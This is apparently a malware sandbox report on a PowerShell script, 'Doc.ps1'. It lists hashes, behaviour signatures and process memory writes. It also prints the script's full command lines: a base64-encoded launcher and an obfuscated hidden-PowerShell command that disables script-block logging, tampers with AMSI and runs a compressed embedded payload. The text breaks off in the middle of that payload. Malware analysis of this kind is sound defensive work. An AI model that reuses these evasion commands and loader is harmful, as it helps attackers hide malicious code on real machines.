a0e25f0023b56e2ba4fdb12892fa55fa91f328b548b66a8f14d0e4e105957bf2

General

Target

Doc.ps1
Size

11KB
MD5

1b79c76903d0db77c6b8056afe67d8e3
SHA1

39baffb17f693bd08cac69c80c8766058bbc2236
SHA256

a0e25f0023b56e2ba4fdb12892fa55fa91f328b548b66a8f14d0e4e105957bf2
SHA512

8754f398c64af28ecf050391a5265b34be4c51f84446c2d8eb601622b77cefcf6ab9162974318083ea07235a1c2b3a575263a32fc46d5c1b181268fb41b3be12
SSDEEP

192:f20Cz1PRfs/FcQGGoYUPthzzP0dL1fyAZLlew8VxYvYLAF42xZaF9F6hdA:fw1QF2GoYUPthf0Pew8VxoDlxZjhdA

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2692	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2692	powershell.exe
1696	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 1696	2692	powershell.exe	31
PID 2692 wrote to memory of 1696	2692	powershell.exe	31
PID 2692 wrote to memory of 1696	2692	powershell.exe	31
PID 1696 wrote to memory of 2216	1696	powershell.exe	32
PID 1696 wrote to memory of 2216	1696	powershell.exe	32
PID 1696 wrote to memory of 2216	1696	powershell.exe	32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Doc.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e YwBtAGQAIAAvAEMAIAAtAC0AJQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AbgBvAHAAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAG4AaQAgAC0AYwAgACIAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAgACQAegBuAFAAOAA9ACgAKAAnACcAUwBjAHIAJwAnACsAJwAnAGkAcAB0ACcAJwArACcAJwB7ADEAfQAnACcAKwAnACcAbABvAGMAawB7ADAAfQBvAGcAZwBpAHsAMgB9ACcAJwArACcAJwBnACcAJwApAC0AZgAnACcATAAnACcALAAnACcAQgAnACcALAAnACcAbgAnACcAKQA7AEkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADMAKQB7ACAAJABiAHQAZgBaAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACgAKAAnACcAewAxAH0AJwAnACsAJwAnAHsAJwAnACsAJwAnADYAfQAnACcAKwAnACcAcwB0AGUAJwAnACsAJwAnAG0AJwAnACsAJwAnAC4AewAnACcAKwAnACcAMAB9AHsAOQB9AG4AewA5AH0AJwAnACsAJwAnAHsANAB9ACcAJwArACcAJwBlAG0AZQBuACcAJwArACcAJwB0AC4AJwAnACsAJwAnAHsAOAB9AHsAMgB9AHQAewA3ACcAJwArACcAJwB9ACcAJwArACcAJwBtAHsAOQB9AHQAaQAnACcAKwAnACcAewA3AH0AbgAnACcAKwAnACcALgB7ADgAJwAnACsAJwAnAH0AJwAnACsAJwAnAG0AcwAnACcAKwAnACcAaQB7ADMAJwAnACsAJwAnAH0AdABpACcAJwArACcAJwB7ADUAJwAnACsAJwAnAH0AcwAnACcAKQAtAGYAJwAnAE0AJwAnACwAJwAnAFMAJwAnACwAJwAnAHUAJwAnACwAJwAnAFUAJwAnACwAJwAnAGcAJwAnACwAJwAnAGwAJwAnACwAJwAnAHkAJwAnACwAJwAnAG8AJwAnACwAJwAnAEEAJwAnACwAJwAnAGEAJwAnACkAKQA7ACAAaQBmACAAKAAkAGIAdABmAFoAKQAgAHsAIAAkAGIAdABmAFoALgBHAGUAdABGAGkAZQBsAGQAKAAoACgAJwAnACcAJwArACcAJwBhACcAJwArACcAJwBtAHsAJwAnACsAJwAnADQAfQBpAEkAewAwACcAJwArACcAJwB9ACcAJwArACcAJwBpAHsAMgB9AHsAJwAnACsAJwAnADEAJwAnACsAJwAnAH0AJwAnACsAJwAnAGEAaQBsAHsAMwB9AGQAJwAnACkALQBmACcAJwBuACcAJwAsACcAJwBGACcAJwAsACcAJwB0ACcAJwAsACcAJwBlACcAJwAsACcAJwBzACcAJwApACwAJwAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwAnACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7ACAAfQA7ACAAJAB6AFcAPQAoACgAJwAnAHsAMQB9AG4AJwAnACsAJwAnAGEAYgBsAGUAewA0AH0AYwB7ADUAfQBpAHsAMAB9AHQAJwAnACsAJwAnAHsAMgB9ACcAJwArACcAJwBsAG8AYwBrAEkAbgAnACcAKwAnACcAewAzAH0AbwBjAGEAdAAnACcAKwAnACcAaQBvAG4ATABvAGcAZwAnACcAKwAnACcAaQBuAGcAJwAnACsAJwAnACcAJwApAC0AZgAnACcAcAAnACcALAAnACcARQAnACcALAAnACcAQgAnACcALAAnACcAdgAnACcALAAnACcAUwAnACcALAAnACcAcgAnACcAKQA7ACAAJAByADgARAA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAoACgAJwAnACcAJwArACcAJwB7ADIAfQB7ADQAfQBzAHQAZQBtAC4AewAzAH0AJwAnACsAJwAnAGEAbgBhAGcAJwAnACsAJwAnAGUAJwAnACsAJwAnAG0AZQBuACcAJwArACcAJwB0AC4AQQB7ADUAfQB0AG8AJwAnACsAJwAnAG0AYQB0AGkAbwBuAC4AewAwAH0AdABpAHsAJwAnACsAJwAnADEAfQBzACcAJwApAC0AZgAnACcAVQAnACcALAAnACcAbAAnACcALAAnACcAUwAnACcALAAnACcATQAnACcALAAnACcAeQAnACcALAAnACcAdQAnACcAKQApADsAIAAkAHEATwBLAD0AJAByADgARAAuAEcAZQB0AEYAaQBlAGwAZAAoACcAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcAJwAsACcAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAJwApADsAIABJAGYAIAAoACQAcQBPAEsAKQAgAHsAIAAkAGsATQBaAD0AJABxAE8ASwAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApADsAIAAkAHkASQB6AGMAbAA9AFsAQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwAuAEQAaQBjAHQAaQBvAG4AYQByAHkAWwBzAHQAcgBpAG4AZwAsAFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAXQBdADoAOgBuAGUAdwAoACkAOwAgACQAdAA4AFoAWAA3AD0AKAAoACcAJwBFAG4AJwAnACsAJwAnAGEAewAzAH0AbABlACcAJwArACcAJwB7ADEAJwAnACsAJwAnAH0AYwByAGkAcAB0AEIAJwAnACsAJwAnAGwAbwBjAHsAJwAnACsAJwAnADIAfQB7ADAAfQBvAGcAZwBpAG4AZwAnACcAKQAtAGYAJwAnAEwAJwAnACwAJwAnAFMAJwAnACwAJwAnAGsAJwAnACwAJwAnAGIAJwAnACkAOwAgAEkAZgAoACQAawBNAFoAWwAkAHoAbgBQADgAXQApAHsAIAAkAGsATQBaAFsAJAB6AG4AUAA4AF0AWwAkAHoAVwBdAD0AMAA7ACAAJABrAE0AWgBbACQAegBuAFAAOABdAFsAJAB0ADgAWgBYADcAXQA9ADAAOwAgAH0AIAAkAHkASQB6AGMAbAAuAEEAZABkACgAJAB6AFcALAAwACkAOwAgACQAeQBJAHoAYwBsAC4AQQBkAGQAKAAkAHQAOABaAFgANwAsADAAKQA7ACAAJABrAE0AWgBbACcAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAAnACcAKwAkAHoAbgBQADgAXQA9ACQAeQBJAHoAYwBsADsAIAB9ACAARQBsAHMAZQAgAHsAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAoACcAJwBTAHkAJwAnACsAJwAnAHMAJwAnACsAJwAnAHQAZQBtAC4AewA1AH0AJwAnACsAJwAnAGEAbgAnACcAKwAnACcAYQB7ADQAfQBlAG0AZQBuAHQALgBBAHsAMwB9ACcAJwArACcAJwB0AG8AbQBhAHQAaQBvACcAJwArACcAJwBuAC4AUwBjAHIAaQBwAHQAewAxAH0AewAwAH0AJwAnACsAJwAnAG8AYwB7ACcAJwArACcAJwAyAH0AJwAnACkALQBmACcAJwBsACcAJwAsACcAJwBCACcAJwAsACcAJwBrACcAJwAsACcAJwB1ACcAJwAsACcAJwBnACcAJwAsACcAJwBNACcAJwApACkALgBHAGUAdABGAGkAZQBsAGQAKAAnACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACcALAAnACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMALgBIAGEAcwBoAFMAZQB0AFsAcwB0AHIAaQBuAGcAXQApACkAOwAgAH0AfQA7ACYAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBjAHIAZQBhAHQAZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAKAAnACcASAA0AHMASQBBAE8AcAAyAGIAVwBjAEMAQQA3AFYAVwBiAFcALwBhAFMAJwAnACsAJwAnAEIARAArAFgAcQBuAC8AdwBhAHEAUQBNAEEAbwBCAFEAMgAnACcAKwAnACcAaQBiAFIAcQBwADAAdABqAEgAQgBMAGkAUwA0AEQAdQBhAHQANgBMAFQAWQBpADcAMQBsAHYAUwBiADIARQBpAEMAOQAvAHYAZQBiAE4AWABaAEkAbABPAFMAdQBkADEATAAzAGkANwAyADcATQA3AE8AegB6AHoAdwB6AHMAOABzAE4AOAB6AGkASgBtAGUAUQBiADAAbwArADMAYgA2AFIAOABEAEYAQwBDAEkAawBrAHUANwBaADMAcgBxAGwAUQBLAHcAOABwAHgAcQAzAFMAcgBSACcAJwArACcAJwB0AEoAbgAnACcAKwAnACcAUwBaADYAcAA2ADMAVQA3AGoAaABCAGgAOAA0AHMATAB7ADEAfQBaAE0AawBtAFAASABEAHYASABhAEoAdQBaAHEAbQBPAEYAcABRAGcAbABPADUASQB2ADAAbABqAFUASwBjADQATgBQAHIAeABYAHsAMQB9AHMAYwBlAG0ASABWAFAAcQB6AGQAawBuAGoAQgBhAEsANQAyAEYANQBIAFgAbwBpAGwAVQA1AFgANQBZAHEAOABYAGUAMABnADQAVgBYAFAAVwBsAEgAQwA1AC8ATwAxAGIAdQBUAEkANwBiAGMAeAByAHgAdQAwAEcAMABWAFEAdQBPAC8AdQBVADQANgBqAG0AVQAxAHEAdQBTAEQAOAByADQAcwBDAGIALwBSAHIATAA1AFQANwB4AGsAagBpAE4AbAA3AHcAMgBJAHUAeQBzAFcAUgB1AHkARgBDADMAeABGAFYAaQA3AHcAMwAzAE0AdwA5AGgAUAB5ADMAQwBYADQAMgAwAFMAegBEAGMASgB5AHkANABsAHIAQgB4AGsANQBEAEwAOABEAHAAJwAnACsAJwAnAEwAWQBVADMAMAAvAHcAVwBsAGEAcgBrAG8AegBZAFgAOAAyAG4ALwA4AGgAegAvAEwARAB2ADIANABZAEoAeABHAHUAbQBZAHoAagBKAEYANAA3AE8ATABrAGoASABrADUAcgBYAGMAUgA4AGkAcgAvAGkANQBSAHkAMABIAEoANABRAEYAcwB3AHIARgBSAEMANwBpADEAZABZAEwAcgBFAE4AcABWAFgAcAB2ADUAaQBSAHIALwBDADIAZwBPADUAWABsAGUAVABIAFMAaQBBADEANABFAG0AbABDAHYARgA4AHsAMQB9AHMAMQArADcARwA4AG8AUABpAGkAVwBYAC8AQgBUAFUASwBBAEMANAAwAEEARAB3AE8ANgBuAGcARwA5AFoAMABDAFkANQAnACcAKwAnACcAUQA4ADQATAB4AEQAawB1AEYARwBPAFcANwBXAEQAdwBWAHgANwBFAEsAYwBtAFUAUAAwAHQASwBWAGUAcgBEADAAWQBqAEgAeQBSADYAbQBwAFoAdABrAGcAeQB2AHoAQgA3AFMAbABVAG4ASgBkAC8AVgBWAGIAagBVAEkAUgAxAEwAYgBKADcAUwBkAFkAbQByAGsAeAA4AGUAZABIAEEAMAA5AEMAWAB3AHAAdABJAHsAMQB9AEkANgBqAGQAdAA0AFMAUgBoAHUANwB4AG0ASwBpAEYAYwB3AFYAWAA0AHAASABIAGgASgBjAFkAWgBIAHIAUgBDADcAQQB2AC8AawBjAHIANgBCACcAJwArACcAJwAvAFQAYQBtAE8ARQBCAGMASQBDAHgAWQA4AFUAegBOAGkAQQBoAC8AMABOAFUAMgBoAFAAbwA0AFUAVAAwAEkAYQBRAHAAZQBRAGIAUQByAFQANQAwADUAQgBFADAAdQBtADYAeQBQAEkANABEAHUATQBBAGUAYQBsAHAAYQBRAEgANwBpAFEAegBuAE4AaQBYADUAdwB1ADUAaQBCAFUAMQBpAGwASwAwADYAbwAwADIARQBDAEMAZQBsAFgASgB3AFkAaABpAHYAeQBxAHAATABDAFgANQBsAHIAcgBoAGMAewAxAH0AWgBiAFAAcgByAGIAMwAxAEIATwBQAEoAVAB5AHcAdAB5ADgAOABnAFQATQAvAEYAQQA5AFoAaQBsAFAATgBoADYARQBGAEEAQwA0AGMAZABiAFkASQA0AGcASwBQAEsAcAAnACcAKwAnACcAUwBsAC8AaABZADIAegBzAGsASwBBADQAdgB2ADQAaQBHAGoAaQBpAEYAdABBAEYATABkAHgAQQBOAFcAQgBFAG8ATwBGAHcAUQBKAFEARQAvAGcAUgBTAFYAbQBvAE8ANQBHAGEAMABwAGoAawBBAGkASwB4AFkAZABpAGcASQBvAEQAWABsAHEAWgBMAHgAQwAnACcAKwAnACcAQQB7ADEAfQBiAEwATAB6AHAAWgAnACcAKwAnACcASgBNAEMAQgA3AFEASwBUAEEAbwB4ACcAJwArACcAJwBIAEwAawBLAGcASABSAHIAegBxAHUAUwBTAGgARQBQAGgARQB7ADEAfQBnAEsAWQB2ADAAUABEADUANABYAEgASABCAEYAVAAzAEEAZQBGAEwAbgBJAHEANQBtADIANQA0AEwANABwAGEAMABuAHUASgBsAEQAawB3AEcAUgBjAEEAQwBoAGsAOABTAFIAaABsAEwAOABvAFgAVwBvAEwAUABLADcAdQBrAEgAYQA3AHcAewAxAH0AdAArAEYANgBGAFkAWABTACsAMgBxADcAbQBEAE4AMgBwADIAewAxAH0AYwB0ADYAcAAnACcAKwAnACcAagBjAG0AUgBpAGsATgB3AHgARABrAHoAVABNAHcARgBGAFAAegBwAHoAVgArAHEAcgB2AFUAWgBPAGMAVwBiAGIAVAA3AHEAcABKAGUAeABjAHUAVgBUAE0AMQBqAGEANgAyAHQAeAB1AGEANgBuAFgASgBSADkAewAxAH0AUwBoAGsAUABRAEkAMwByAFAALwByADQAegBWAFYAKwBMAGcAbgBFAHcAMABiAHsAMQB9AG0ASQBCAHkAYgBjAEoARABlACcAJwArACcAJwBDADgAdwBBAHYAcABvAFoAZQBwAG8AeQBWAFEASgBOAE0AYgBsADUAYQBUAGcAOQBXADkAYwBzAGsATABkAGIAagBXAGwAMgBUAHYAMgBjAGEAdQBUAGUATQBSADIAMQBPAHgATABuADIAVgAnACcAKwAnACcANwBYAGEAcQBNAGQAbgBHAE8AMABXAHQAMwB4ADcAawBhADkANgBsAHQAcQAyAEwAbgAyAE8ANAAxAG0ASgB6AFMASQBvAHEANABjAHUAMgB0AFAAVgA1AGUAOQB0AHAASABOAFAAVABHADMASgA2AGwAQgBqAE0ANABFADcATgBpADIARwArAEsAUgB1ADkAWgBHAFIAbQBkAHEAdQAyAHMAegBPAE4AawBHAHQAdAB1AHIAdAB6AHEAaABCAHUAcwBtADIAewAxAH0AWABXAFQAaAAxAEcAbwAyAEgAZABNAHsAMQB9ACsAKwBUADgALwB2ACsAKwBDAHUANwBVADQAdABnAHEAZABtAGcAUABlAEIAYQBxAHUAcQBNADIASABVAFcAVwB4ADEAVgBWADkATQAzAE8AWQBYAFYAMQAxADEAaAByAEMAMgB1AGoASABaAHoAbAA2AHMAKwAvADUAKwAwAHEAMQAvAGMAdgBzAEUAcgAyAFAAVgBOAGwAUwAxAFEAeQBFADMASQB4AFYAdAAyAC8AWABHAEsAUAA1AGkAdQArAC8AdABvAGEASABzADkAawBOAGwAdAB6AFcAKwAxADcAYwBHAHMAYgBhAHIALwBEAHUAOAAvAFAAQQBoAHEAQwA5AGIAZwA3AHIAcgBtAEsAeQBMAFEAZwAzADgAMwBWAHUAdABGAGIARgBPAFkAQwA5AEMAcgBqAEoAWgAxAGwAMgBCAFgAOQB0AGcAOQBYAHMAMgBwAG0AaQBnAE4AMgBLADYAcQBEAGUARwBwAFAAMQBSADAAMAB5AEMATABZAEgAaAByAFMAYgB1AGIAYgBMADMAOQBpAEwAVwBtADEANgA0ACcAJwArACcAJwBCAEoALwBNADQATgB3AE8AeABqAEYAcgBvAGgAWABZAEgAUQBVAHEAZQBBAHsAMQB9ADMAZwB6AGcAdgBMAFIATgAwAHQAQQAwACcAJwArACcAJwBsAHEAKwAnACcAKwAnACcASABKAFcATgBpAHkAdABrAHAAawAnACcAKwAnACcANwBSAFQAaABaADIAUwBkAGcAMgAvAE4AMwBBAGUAVgBNADMATgBjAEIALwAvAFUAYgB0AHYAUgAyAGEAVgBqAGoAcABzACsANwBtAGoAMQBFACsALwB6AE8ANgBEAGsAYgBFAGcAWQBQADIAdgBPAFMAKwBoAFAAVQBhAHYAewAxAH0AdgBpAG0ARgA1ADgAMQBIAHYASAB5AHQARAB7ADEAfQBWAFIAawBvAGEASQBBAGwAKwBoAHcAUgBUAFYAbwBoAE0AbgBuAGIAeAByAEQARwBJAGkATgBHAFEAWgBIAGgAMAByAG4ARABCAE0AbwBWAFYARABNAHkAOABTAFQAYQBVADAAOQBrAFMALwB5AHIAbwBMADkATQBwAEQAQgB4AE0ATgBkAFcAaABtAEgAcgAzADAAVgA1AEUAZQBCAEMAdgBIAFIAbABZAHMAWABWAHgATQB3AFUAZQBSAHcAVgA2AHQAaAAxAG4AQQB3ADYAcQB5AE8AMQBNAFUANgBFAEQASwBUAG0AbABsAE8AewAxAH0AcgByADkAOQBMAGoAOQBWADQARwBVADEAWABSAHcAUQBRAHEAQgA4AE0AMABNAHcAeQAyAHkARgBLAFMANQBkADgATgBFADcAeABRAE8ARgBUAE0AMQA0AEYANgBEAFQATQA0AGUAUQBWAEYARABpAHIAdQBvAHsAMQB9AGcASQA1AEwAUQA0AHAAbwA5AHgATwAxAHoAcQBnAFEARgBIADEAQQBDAHUAQgBsAHgANgBKAHAANABtAFEAQQB4AFEAUABzAFcAMwBVAG8AbQBMAHoAdgAzADQASgBWAEIASwB4ADcAKwBUAEsAbgBuAHgARABPAEgAagAvAHgAdABWAGoAbQB2AC8AcwBQAHQATAA5AEYARwBxAEcAUwA3AFAAVgBwADgAdQBQAEcAbwA1AHYAKwAzACsASQAwAFEANAB5AEQAbgBRAEIAQwBnACsAUABFACcAJwArACcAJwBkAGUAaABpAEYAUABqAGsAZQBSAFQAYwBkAEEALwBXAFUAKwAnACcAKwAnACcAeABPAHYAOABlAHMATgBQAHIAKwBDADkAbAB6AFcAaAB2AHcARQBGADUANABuAC8ARQBnAHcAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBmACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsAIgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C --% powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){=C:\Windows+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{='powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Arguments='-noni -nop -w hidden -c =((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If(System.Collections.Hashtable.PSVersion.Major -ge 3){ =[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if () { .GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue(,True); }; =((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); =[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); =.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If () { =.GetValue(); =[Collections.Generic.Dictionary[string,System.Object]]::new(); =((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If([]){ [][]=0; [][]=0; } .Add(,0); .Add(,0); [''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+]=; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue(,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''